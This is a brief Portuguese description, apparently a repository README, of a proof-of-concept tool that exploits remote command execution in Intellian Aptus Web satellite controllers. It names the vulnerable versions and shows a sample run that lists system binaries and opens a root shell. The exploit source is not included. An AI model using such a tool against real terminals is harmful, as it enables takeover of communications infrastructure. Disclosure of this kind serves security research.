
Script de PoC que mostra vulnerabilidade RCE no controlador de satélite Intellian
Satellian é um script PoC que demonstra uma vulnerabilidade de execução remota de comandos (RCE) no controlador de satélite Intellian (Intellian Aptus Web).
O script a seguir tentará listar todos os binários do sistema e, em seguida, permitirá que o testador interaja diretamente com o servidor (geralmente como root).
xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
________________________________________
(__) / \
(oo) ( Intellian Satellite Terminal PoC )
/-------\/ --' \________________________________________/
/ | ||
* ||----||
Performing initial scan. Listing available system binaries.
Starting request to http://<redacted>
Executing command /bin/ls /bin
acu_server
acu_tool
addgroup
adduser
...
Satellian $ id
uid=0(root) gid=0(root)
Intellian v1.12, v1.21, v1.24.
Todas as informações neste repositório são apenas para fins educacionais. O autor do repositório não é responsável por qualquer uso indevido das informações. Este script é apenas uma prova de conceito e não foi desenvolvido para atividades maliciosas.